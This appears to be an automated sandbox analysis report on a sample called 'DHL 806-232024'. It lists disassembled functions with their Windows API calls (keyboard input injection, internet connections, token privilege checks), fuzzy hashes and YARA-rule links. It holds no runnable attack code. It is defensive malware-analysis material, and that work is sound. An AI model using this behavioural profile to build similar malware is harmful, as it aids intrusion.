Instruction Fuzzy Hash: 7C41B475740210AFEB10AF28DC86F3A77E9EB44B24F448519FA59DB3D2DB709C008B92

Function 0094672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0095F910), ref: 009467BA
_strlen.LIBCMT ref: 009467EC

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 4df84759e7be00890da83f5ef1e45e12783f102577908824887e4f7753bfed9f
Instruction ID: d4eaeeaeee38ae14acbbaf48949b48c854e7b0864beb2741895cf90542402c7d
Opcode Fuzzy Hash: 4df84759e7be00890da83f5ef1e45e12783f102577908824887e4f7753bfed9f
Instruction Fuzzy Hash: E4418071A00214ABCB14EB68DCD5FAEB7A9EF49314F148266F91697392DB30AD01CB52

Function 0093BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0093BB09
GetLastError.KERNEL32(?,00000000), ref: 0093BB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0093BB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0093BB80

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 164f9bfe9fcd1c64347448062300bbcf2c50f85a559a8c3993058bbf7a80a071
Instruction ID: 756979e02bdf42f23b05415bc9c019313bb9f7bb54907dee682be9b7db5ecdac
Opcode Fuzzy Hash: 164f9bfe9fcd1c64347448062300bbcf2c50f85a559a8c3993058bbf7a80a071
Instruction Fuzzy Hash: 42411A39200610EFCB10EF19C594A59BBE1FF49320F099499F98A9B362CB34FD01DB92

Function 00958AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00958B4D

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 5721055007c7e62a8de883eeaaf49dcd8ae868f42c5476e60cdf03ed38ee309f
Instruction ID: bc16fce6d17c96a3f332ccad33bd29bac8678c5d4b0d8bbac73436990bbcd30b
Opcode Fuzzy Hash: 5721055007c7e62a8de883eeaaf49dcd8ae868f42c5476e60cdf03ed38ee309f
Instruction Fuzzy Hash: 8531E674605208BFEF20DF5ACC55FAB37ADEB05362F244A12FE51F62A0DE34A9489741

Function 0095ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0095AE1A
GetWindowRect.USER32(?,?), ref: 0095AE90
PtInRect.USER32(?,?,0095C304), ref: 0095AEA0
MessageBeep.USER32(00000000), ref: 0095AF11

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: e1d742e2554a87e0719e5534d87612769bf30e66772b0d77bcf75bcdc537245e
Instruction ID: f402670e29ca290a51618ec01509616127bab3fe3d341b7eded0b1ee794f73a8
Opcode Fuzzy Hash: e1d742e2554a87e0719e5534d87612769bf30e66772b0d77bcf75bcdc537245e
Instruction Fuzzy Hash: D041CF70604209DFCB11CF5AD885B697BF5FF89352F1482A9EC05DB250D730A849DF56

Function 00930FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00931037
SetKeyboardState.USER32(00000080,?,00000001), ref: 00931053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 009310B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0093110B

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2c2d4e0f4901b9fd431552f4541f854b1054bb12a32873279f0e91af327b1f09
Instruction ID: c22ea8a976997c111b712f90e8da32f1a474aab7dc8f937d9d1648b0a12d7b1b
Opcode Fuzzy Hash: 2c2d4e0f4901b9fd431552f4541f854b1054bb12a32873279f0e91af327b1f09
Instruction Fuzzy Hash: 6A314B30E44688AEFF388B668C057F9BBADAB88320F04421AF581561F1C37489D19F52

Function 00931121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00931176
SetKeyboardState.USER32(00000080,?,00008000), ref: 00931192
PostMessageW.USER32(00000000,00000101,00000000), ref: 009311F1
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00931243

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: d8579b3a7d79d35b2e587a05ecc1bcc6a690806799b4d7ef8b0926d81b1ff147
Instruction ID: fe605353d409402c2fa03745df5489bde6e23dfdc2a16cf1e6a96ee9705d0ebe
Opcode Fuzzy Hash: d8579b3a7d79d35b2e587a05ecc1bcc6a690806799b4d7ef8b0926d81b1ff147
Instruction Fuzzy Hash: 83313A3094870C5EFF348AA68C187FA7BAEAB89320F04475AF591921F1D37849559F61

Function 00906415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0090644B
__isleadbyte_l.LIBCMT ref: 00906479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009064A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009064DD

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 6ad180f7b122917408abcf1d058ca88bc0ce677e633f3b762105dbaa5e8a1c86
Instruction ID: 155c4ad5c2281d3e9629e39ba3db26ff3d60acc90a2f8efaa15caf9489eff4ef
Opcode Fuzzy Hash: 6ad180f7b122917408abcf1d058ca88bc0ce677e633f3b762105dbaa5e8a1c86
Instruction Fuzzy Hash: 4D31AF3160425AEFDB218F79CC85BBA7BA9FF41320F154429F854971E1EB31D860DB90

Function 00955175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00955189

Part of subcall function 0093387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00933897
Part of subcall function 0093387D: GetCurrentThreadId.KERNEL32 ref: 0093389E
Part of subcall function 0093387D: AttachThreadInput.USER32(00000000,?,009352A7), ref: 009338A5

GetCaretPos.USER32(?), ref: 0095519A
ClientToScreen.USER32(00000000,?), ref: 009551D5
GetForegroundWindow.USER32 ref: 009551DB

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: c05bdc0cfe6942c5101a93cb4bd3aed3f1db307e9f5af3e56b3b0903ec584c87
Instruction ID: da6be9bc43f8d199a3cd1c6de19f1b98549b053c253dca4be15fdf2c69899ed5
Opcode Fuzzy Hash: c05bdc0cfe6942c5101a93cb4bd3aed3f1db307e9f5af3e56b3b0903ec584c87
Instruction Fuzzy Hash: ED312F72900118AFDB00EFA9C885EEFB7FDEF98304F10406AE455E7241EA759E05CBA1

Function 0095C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623

GetCursorPos.USER32(?), ref: 0095C7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0090BBFB,?,?,?,?,?), ref: 0095C7D7
GetCursorPos.USER32(?), ref: 0095C824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0090BBFB,?,?,?), ref: 0095C85E

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 0f259609608cfb25d11b70638647843b8acab02eb5eb1abfc695c19f296bda27
Instruction ID: ed6f4afef8106c4dfb34c500f5097474373163956ef954ff72fe5ffc4c2a86e4
Opcode Fuzzy Hash: 0f259609608cfb25d11b70638647843b8acab02eb5eb1abfc695c19f296bda27
Instruction Fuzzy Hash: 7231A075600218BFCB15CF5AC898EFA7BBAEB49321F044169FE058B261C7319D55EFA0

Function 00928B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00928652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00928669
Part of subcall function 00928652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00928673
Part of subcall function 00928652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00928682
Part of subcall function 00928652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00928689
Part of subcall function 00928652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0092869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00928BEB
_memcmp.LIBCMT ref: 00928C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00928C44
HeapFree.KERNEL32(00000000), ref: 00928C4B

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 016e77a47f3b9de1113120fe44358b0869c6b8400d503611aaf6f102aafd04db
Instruction ID: 190de50f9766d74c27574e4a6f3d1da81e1a024d12757b528eb73ce6b93559d4
Opcode Fuzzy Hash: 016e77a47f3b9de1113120fe44358b0869c6b8400d503611aaf6f102aafd04db
Instruction Fuzzy Hash: EC21AC71E02219EFDB00DFA4D949BEFB7B8EF40355F144099E494A7240DB30AE06DB60

Function 008F0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 008F0BF2

Part of subcall function 008D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00937B20,?,?,00000000), ref: 008D5B8C
Part of subcall function 008D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00937B20,?,?,00000000,?,?), ref: 008D5BB0

_fprintf.LIBCMT ref: 008F0C29
OutputDebugStringW.KERNEL32(?), ref: 00926331

Part of subcall function 008F4CDA: _flsall.LIBCMT ref: 008F4CF3

__setmode.LIBCMT ref: 008F0C5E

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: cdf2216f68665658d525320e5e9ff18108235c6f5ddac1d0fab5c58cb13d99f5
Instruction ID: 69c24eb68a251795358ac08e35916be241a60a22fdd5168f46cefe16103429b1
Opcode Fuzzy Hash: cdf2216f68665658d525320e5e9ff18108235c6f5ddac1d0fab5c58cb13d99f5
Instruction Fuzzy Hash: 9B11E432A0421C7EDB04B7B8AC46ABF7B69FF81320F14021BF314D7292DE615D969796

Function 00941A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00941A97

Part of subcall function 00941B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00941B40
Part of subcall function 00941B21: InternetCloseHandle.WININET(00000000), ref: 00941BDD

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 56a904dff1a65ee16b6081ff6683d671e35c90604ba3cb7d286981d06e286363
Instruction ID: b4f4f0f2432e8ceaa88e7eb874e14f8a79adc77d0fab8d42afe86ceac652bc14
Opcode Fuzzy Hash: 56a904dff1a65ee16b6081ff6683d671e35c90604ba3cb7d286981d06e286363
Instruction Fuzzy Hash: F721C035204701BFEB169F61CC01FBBBBADFF88711F10041AFA5596661EB71E851ABA0

Function 0092E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0092F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0092E1C4,?,?,?,0092EFB7,00000000,000000EF,00000119,?,?), ref: 0092F5BC
Part of subcall function 0092F5AD: lstrcpyW.KERNEL32(00000000,?,?,0092E1C4,?,?,?,0092EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0092F5E2
Part of subcall function 0092F5AD: lstrcmpiW.KERNEL32(00000000,?,0092E1C4,?,?,?,0092EFB7,00000000,000000EF,00000119,?,?), ref: 0092F613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0092EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0092E1DD
lstrcpyW.KERNEL32(00000000,?,?,0092EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0092E203
lstrcmpiW.KERNEL32(00000002,cdecl,?,0092EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0092E237

Strings

cdecl, xrefs: 0092E22E

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: bc74cc6ea9065c7c0d13b18aa4f52523f789c4df341e2a51fa6f36dee425c354
Instruction ID: ebcf3625d89c4506b92f1674e448805c6bb9adfe5d58f5494a2a8a9fc5fe59f6
Opcode Fuzzy Hash: bc74cc6ea9065c7c0d13b18aa4f52523f789c4df341e2a51fa6f36dee425c354
Instruction Fuzzy Hash: 4211BE36204315EFCB25AF74E885E7A77BCFF84350B40402AF816CB2A8EB719850D7A0

Function 00905332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00905351

Part of subcall function 008F594C: __FF_MSGBANNER.LIBCMT ref: 008F5963
Part of subcall function 008F594C: __NMSG_WRITE.LIBCMT ref: 008F596A
Part of subcall function 008F594C: RtlAllocateHeap.NTDLL(00E10000,00000000,00000001,00000000,?,?,?,008F1013,?), ref: 008F598F

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 85ecc728b172c37cb5f7fca5717d0e607c20ad8a6692dd1e720d550292642dfa
Instruction ID: 7143e846d785f827ee5087700180d90fe0ed179ec404125032aa140ce7e22f2d
Opcode Fuzzy Hash: 85ecc728b172c37cb5f7fca5717d0e607c20ad8a6692dd1e720d550292642dfa
Instruction Fuzzy Hash: 9611BC32508A19EECB213B78AC0566E3B98EF143E0B21482AFA04DB1D0DAB589409B91

Function 008D4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008D4560

Part of subcall function 008D410D: _memset.LIBCMT ref: 008D418D
Part of subcall function 008D410D: _wcscpy.LIBCMT ref: 008D41E1
Part of subcall function 008D410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008D41F1

KillTimer.USER32(?,00000001,?,?), ref: 008D45B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008D45C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0090D6CE

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 85fdf4aa4cc2da5e37beadc3c2c1c6c611082ec4b6c64be38f13e2541cdeeb2c
Instruction ID: a2d86a8ec1b8739e3e84a2cd44cb6f2eb47cd709ea9a3ccfb7349d5a3cde6602
Opcode Fuzzy Hash: 85fdf4aa4cc2da5e37beadc3c2c1c6c611082ec4b6c64be38f13e2541cdeeb2c
Instruction Fuzzy Hash: DE212670909784AFEB328B64DC55BEBBBECEF01318F00009EE29E96281C7755A84DB51

Function 0094667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 008D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00937B20,?,?,00000000), ref: 008D5B8C
Part of subcall function 008D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00937B20,?,?,00000000,?,?), ref: 008D5BB0

gethostbyname.WSOCK32(?,?,?), ref: 009466AC
WSAGetLastError.WSOCK32(00000000), ref: 009466B7
_memmove.LIBCMT ref: 009466E4
inet_ntoa.WSOCK32(?), ref: 009466EF

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 5c6d17750aae240a24607e8e314124fce496d2bb872cde189d3f2a84495259e4
Instruction ID: fd78022b14feaab3e49f25633349861fceb0bc92cabad645fbdf6b93d8521e5d
Opcode Fuzzy Hash: 5c6d17750aae240a24607e8e314124fce496d2bb872cde189d3f2a84495259e4
Instruction Fuzzy Hash: C5114C75500609ABCB00EBA8D996DEEB7B8FF44321B144166F502E7261DF30AE04DB62

Function 00929023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00929043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00929055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0092906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00929086

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
